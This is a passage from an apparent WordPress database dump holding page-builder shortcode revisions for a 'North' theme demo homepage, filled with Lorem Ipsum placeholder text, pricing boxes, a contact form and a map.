its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483488171{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709924097{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709931694{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709939804{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506234346{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773959059{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309e913-d736\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309e913-d736\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309e913-d736\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home6','','inherit','closed','closed','','717-revision-v1','','','2014-07-15 13:02:37','2014-07-15 13:02:37','',717,'http://highperformingstudent.com/2014/07/15/717-revision-v1/',0,'revision','',0),(721,1,'2014-07-15 13:13:51','2014-07-15 13:13:51','[vc_row css=\".vc_custom_1405454957992{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #4c4c4c !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"false\" bg_overlay=\"dark\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"Welcome to North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"WE CREATE AWESOME THEMES!,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN 